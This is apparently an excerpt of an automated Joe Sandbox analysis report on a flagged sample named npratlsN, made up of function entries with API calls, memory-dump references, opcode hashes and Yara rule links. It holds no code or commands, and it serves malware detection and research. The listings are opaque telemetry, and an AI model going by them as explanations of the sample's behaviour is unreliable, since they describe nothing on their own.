                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2C96BDDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          • Opcode ID: fd9887bc9f7ef8a6e4598a02dd40fdd1d481c34542f8cec8a7a467a0f1d5c2df
                                                                                                                                                                          • Instruction ID: e15c8c4eb6a15bbee6c1cfbf031378caa3cd7c1194d024fd11c09af4027bd571
                                                                                                                                                                          • Opcode Fuzzy Hash: fd9887bc9f7ef8a6e4598a02dd40fdd1d481c34542f8cec8a7a467a0f1d5c2df
                                                                                                                                                                          • Instruction Fuzzy Hash: 184176B9D042589FCF00CFA9D984ADEBBF5FB09310F24906AE918AB350D335A945CF94
                                                                                                                                                                          Function 2C96BD10 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2C96BDDB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090259033.000000002C960000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C960000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c960000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                                          • Opcode ID: ded17c8b10e6ecd78917887fe9d0d1f9310c02167a0f8bc58a1271d082d4913d
                                                                                                                                                                          • Instruction ID: 2cb073642cc5250a26832be6a35c84cbe57a08d56e0ece8856b134c9ac6665d8
                                                                                                                                                                          • Opcode Fuzzy Hash: ded17c8b10e6ecd78917887fe9d0d1f9310c02167a0f8bc58a1271d082d4913d
                                                                                                                                                                          • Instruction Fuzzy Hash: A54167B9D002589FCF00CFA9D984ADEBBF4BB09310F24906AE918BB310D335A945DF94
                                                                                                                                                                          Function 2D024D54 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 2D0293C1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                                          • Opcode ID: 5ea7f9b03a7b89996672e87f37fc3a0f8c15e080fcef57b40ae7d97ad2de79e7
                                                                                                                                                                          • Instruction ID: 7de390c8d4419fd3eb8861a39704ac3ac38a854c0ed117e78699858469bb0fef
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ea7f9b03a7b89996672e87f37fc3a0f8c15e080fcef57b40ae7d97ad2de79e7
                                                                                                                                                                          • Instruction Fuzzy Hash: BB4127B4A00605DFDB04CF99C888AAEBBF5FB88310F25C559D519AB361C774A941CFA0
                                                                                                                                                                          Function 285FEEE8 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 285FEF8C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074843279.00000000285F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 285F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_285f0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                          • Opcode ID: 8d164decaadb9198667094d871c03ebaf46eb14ee0406653a9d0f0058778cb00
                                                                                                                                                                          • Instruction ID: 10f8271e664bcfcf331600e71ba68d3606a18a8cc101c7771619272f5bcc349d
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d164decaadb9198667094d871c03ebaf46eb14ee0406653a9d0f0058778cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: 013197B4D052589FCB10CFA9D980ADEFBF0BB49310F20942AE818BB210D775A945CF98
                                                                                                                                                                          Function 2D024618 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 2D0246AA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3091360143.000000002D020000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D020000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2d020000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                          • Opcode ID: 5079a1eedde23bd74a9b74843608718dee3fa371d188f1b53006494eecf7b824
                                                                                                                                                                          • Instruction ID: 5ae5ee29661c9d333baad37ddbf1db1343d537909be9a23a865383a73a3d917c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5079a1eedde23bd74a9b74843608718dee3fa371d188f1b53006494eecf7b824
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E31BBB4D01658DFCB14CFAAD488ADEFBF5AB49314F14906AE818B7320D374A941CFA5
                                                                                                                                                                          Function 2C887E0C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrInitializeThunk.NTDLL(00000000), ref: 2C887F4E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089414791.000000002C880000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C880000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c880000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: b4142e48c5a929e5fcc597bf5a24f62dd63f3f8f72ea26825a2388b8ce61c249
                                                                                                                                                                          • Instruction ID: 385bca96274830e5c8526875b87be42c7e95f3afae5e6ddc44f7aef21472bd70
                                                                                                                                                                          • Opcode Fuzzy Hash: b4142e48c5a929e5fcc597bf5a24f62dd63f3f8f72ea26825a2388b8ce61c249
                                                                                                                                                                          • Instruction Fuzzy Hash: B9115974E0110DCFDB04DFA9D584EADBBB5BB88304F20D664F904A7642DB30A941CB60
                                                                                                                                                                          Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString_malloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 959018026-0
                                                                                                                                                                          • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                          • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                          • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                                                          Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000008.00000001.1851558247.000000000043F000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_1_400000_npratlsN.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                          • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                          • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                          • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                          • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                          Function 2C898D18 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3089514926.000000002C890000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C890000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c890000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: nKvq
                                                                                                                                                                          • API String ID: 0-3625296599
                                                                                                                                                                          • Opcode ID: ad4b90cd10760c55cf030e7165fed12062fd99e8464ff89ff416c392fc6a9799
                                                                                                                                                                          • Instruction ID: c75cf1ef67d23f5bf252239fba73b533d06267ddefdb7b775224d53981cd8078
                                                                                                                                                                          • Opcode Fuzzy Hash: ad4b90cd10760c55cf030e7165fed12062fd99e8464ff89ff416c392fc6a9799
                                                                                                                                                                          • Instruction Fuzzy Hash: 4981C274E01219DFDB04DFA9D994ADEBBB2FF88300F10842AD919AB364DB356946CF50
                                                                                                                                                                          Function 2C95CA80 Relevance: 1.4, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: f36cf511ae8259a36ef5925e6415e9b05f0cfe1f156d18009ef1eec2194036e4
                                                                                                                                                                          • Instruction ID: 9c6dac474d1ec511cac22ffd48183621ad83ef87d3c5edb4ae95d2a0ef355898
                                                                                                                                                                          • Opcode Fuzzy Hash: f36cf511ae8259a36ef5925e6415e9b05f0cfe1f156d18009ef1eec2194036e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 6281BE74E012699FDB65DF29C890BDDBBB2BF89300F1080EAD948A7254DB755E81CF80
                                                                                                                                                                          Function 2C947390 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8669767af6c8552bc07746d0f896442a3d7f1c095dd545b836ea59e1ca683342
                                                                                                                                                                          • Instruction ID: 6514ce8e691dab2f8567067132f410228a933cdeb959d235b9112787f13d3abd
                                                                                                                                                                          • Opcode Fuzzy Hash: 8669767af6c8552bc07746d0f896442a3d7f1c095dd545b836ea59e1ca683342
                                                                                                                                                                          • Instruction Fuzzy Hash: 9271A174E01218CFDB14DFA9D990AEDBBB2AF89300F249529D804BB395DB359986CF50
                                                                                                                                                                          Function 2C941360 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: a03995d3b6f0d38bcf03176a75081a7802b6cae8309cc21112835cb6b5d7f979
                                                                                                                                                                          • Instruction ID: 6e072bf7cae743be0110fa873279cbb7e9a04ff352a805ab0a8018c3ec0088db
                                                                                                                                                                          • Opcode Fuzzy Hash: a03995d3b6f0d38bcf03176a75081a7802b6cae8309cc21112835cb6b5d7f979
                                                                                                                                                                          • Instruction Fuzzy Hash: A371B174E01218CFDB14DFA9D990ADDBBB2AF89300F209529D805BB394DB359986CF54
                                                                                                                                                                          Function 2C95C790 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 047233eef0d412966e219eb5442b7bb43d8440c88ae3d60146b9f20c1e806c94
                                                                                                                                                                          • Instruction ID: e015fa71131ec3169fe88b295d1a909536031ddef8bd7058362f52292a10078a
                                                                                                                                                                          • Opcode Fuzzy Hash: 047233eef0d412966e219eb5442b7bb43d8440c88ae3d60146b9f20c1e806c94
                                                                                                                                                                          • Instruction Fuzzy Hash: AA71C174E00218CFDB04DFA9D990AEDBBF2AF89300F249529D405BB395DB399986CF50
                                                                                                                                                                          Function 2C956760 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: e81db8a432d4aa5ca1ba629e47b48387bc9496fa67d7cc4f13510b6a4467f775
                                                                                                                                                                          • Instruction ID: e84605c5a848e5cb32d6b4881b7ddb54fe6303f90f4ffd2383319fde2edeff3a
                                                                                                                                                                          • Opcode Fuzzy Hash: e81db8a432d4aa5ca1ba629e47b48387bc9496fa67d7cc4f13510b6a4467f775
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A71C374E00218CFDB14DFA9D990AEDBBB2BF89300F209529D404BB395DB359986CF50
                                                                                                                                                                          Function 2B7C9D80 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: (o^q
                                                                                                                                                                          • API String ID: 0-74704288
                                                                                                                                                                          • Opcode ID: 0dd733c2e6cb06d5d5094dbe802d4ba9a195dfa4762a8d412e2fcc825e991a61
                                                                                                                                                                          • Instruction ID: 753e6f039573e3eaae29df136ce9c2f4bb29599c6b313bbd21f2458adc3815fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0dd733c2e6cb06d5d5094dbe802d4ba9a195dfa4762a8d412e2fcc825e991a61
                                                                                                                                                                          • Instruction Fuzzy Hash: 8F41CF36B002548FCB059BB9D85869EBBB6FFC8311F244469E906D7391EF35AC01CB90
                                                                                                                                                                          Function 2C94EFE7 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 93585b700a4207f9e1a164712f0ededded46d43a0c2b18f61e3c82882b8a382c
                                                                                                                                                                          • Instruction ID: 3bdab2774aad3b603a06dfc4ea90a09adbd838cb1104fa9717587d8013218f34
                                                                                                                                                                          • Opcode Fuzzy Hash: 93585b700a4207f9e1a164712f0ededded46d43a0c2b18f61e3c82882b8a382c
                                                                                                                                                                          • Instruction Fuzzy Hash: C031D074E01259CBDF18DFAAD9406DEBBF2AF89300F10D17AD418AB294DB35A946CF50
                                                                                                                                                                          Function 2C94760B Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: c97179087f052a5f4e41664c703707886c1a4f5d624492546b394812a133a8c7
                                                                                                                                                                          • Instruction ID: 1fe974b373a1f1682a639a7088f52fef544e18ad54fcb130eedf4c5cc73f965c
                                                                                                                                                                          • Opcode Fuzzy Hash: c97179087f052a5f4e41664c703707886c1a4f5d624492546b394812a133a8c7
                                                                                                                                                                          • Instruction Fuzzy Hash: ED310370E01258CBDB18CFAAD8406DEFBF2AF89300F20D56AD418BB254EB355946CF55
                                                                                                                                                                          Function 2C947383 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 9f823b85e868a4d7a64c51ef46dec0b4136b32f3ae0c308966abfad9c39e5c0c
                                                                                                                                                                          • Instruction ID: ab406c96e686597e275b343a13767aa6ae9f46b4538fc40995a0653a5a948b38
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f823b85e868a4d7a64c51ef46dec0b4136b32f3ae0c308966abfad9c39e5c0c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4931D274E012088BDB14DFAAD5506DEFBF3AF89300F24D529D408BB255EB356A46CF50
                                                                                                                                                                          Function 2C95643A Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 8e1d37e2de8d6aa777fadd443364977c021951fe9675d8bd52f34f73ad32ab1d
                                                                                                                                                                          • Instruction ID: 138d7d50a83c35ea5e6321ecf7fa8feb0cab7adbba9664e7d3a1a3943f428898
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e1d37e2de8d6aa777fadd443364977c021951fe9675d8bd52f34f73ad32ab1d
                                                                                                                                                                          • Instruction Fuzzy Hash: D931C275E01218CBDB08CFAAD9406DEFBF2AF89340F10D129D419BB258DB345946CF50
                                                                                                                                                                          Function 2C941353 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090073724.000000002C940000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C940000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c940000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: fb1f88984adb8c8a727efba0e6bc7f9c9fa5b912158ebbd02977de421faa76b3
                                                                                                                                                                          • Instruction ID: 738588c518efe93821b956bbff8182ece83df575718c1e1d50b76f757c11bda5
                                                                                                                                                                          • Opcode Fuzzy Hash: fb1f88984adb8c8a727efba0e6bc7f9c9fa5b912158ebbd02977de421faa76b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F31D074E012088BDB18DFAAD9906DEFBF2AF89300F24D52AD419BB254EB345946CF54
                                                                                                                                                                          Function 2C95C78A Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 2976a42bd6621b12776836f2ab6e6e05fb2eb62963d66b1de27c2099528a63b4
                                                                                                                                                                          • Instruction ID: 16398e5c336e7f06f682c5425278faa09891d296eb2f069559270687a47b50fd
                                                                                                                                                                          • Opcode Fuzzy Hash: 2976a42bd6621b12776836f2ab6e6e05fb2eb62963d66b1de27c2099528a63b4
                                                                                                                                                                          • Instruction Fuzzy Hash: 5131E470E01608CBDB08DFAAC9506DEBBF2AF89340F24D52AD418BB254EB345942CF54
                                                                                                                                                                          Function 2C95675A Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3090164707.000000002C950000.00000040.00000800.00020000.00000000.sdmp, Offset: 2C950000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2c950000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8`{+
                                                                                                                                                                          • API String ID: 0-1014734095
                                                                                                                                                                          • Opcode ID: 3dd4af2ca4c0982d258b3188c1bb49acfb6afe687c79eec306ce4b6d82706cab
                                                                                                                                                                          • Instruction ID: 9a237f7cde934d5650774107fc7cf6196718b498ad3d7dec8fe020dc106ac4ea
                                                                                                                                                                          • Opcode Fuzzy Hash: 3dd4af2ca4c0982d258b3188c1bb49acfb6afe687c79eec306ce4b6d82706cab
                                                                                                                                                                          • Instruction Fuzzy Hash: A531C274E012088BDB04DFAAD9906DEBBF2AF89340F24D52AD418BB354DB346A46CF50
                                                                                                                                                                          Function 285FF1B8 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3074843279.00000000285F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 285F0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_285f0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                          • Opcode ID: 492d52058cbf0a4f0d43c8c4ae671a516ad88b2a3c4988318b0d2fade36e04be
                                                                                                                                                                          • Instruction ID: 067676f1e9fa9dd233a0b78ffae2f2ead7dea804aec0a150f4aed8e26f53e3ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 492d52058cbf0a4f0d43c8c4ae671a516ad88b2a3c4988318b0d2fade36e04be
                                                                                                                                                                          • Instruction Fuzzy Hash: D2319AB5D012589FCF14CFA9E981ADEFBF4AB49310F14942AE815B7310CB75A941CFA8
                                                                                                                                                                          Function 2B7CCB20 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.3086764521.000000002B7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 2B7C0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_2b7c0000_npratlsN.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 69472505e1297e944eda1e0a07c28c4ac1db3beba5e317f7464fb25014422ea5
                                                                                                                                                                          • Instruction ID: 886fb116761113605e0c14f422db1f6232aaea2b5b0f9dfe9b44174abdd3a611
                                                                                                                                                                          • Opcode Fuzzy Hash: 69472505e1297e944eda1e0a07c28c4ac1db3beba5e317f7464fb25014422ea5
                                                                                                                                                                          • Instruction Fuzzy Hash: B212A5700262479FA24D2F2086BC96BBE64FF2F327701BE44E1AFD1455DF3885899E25
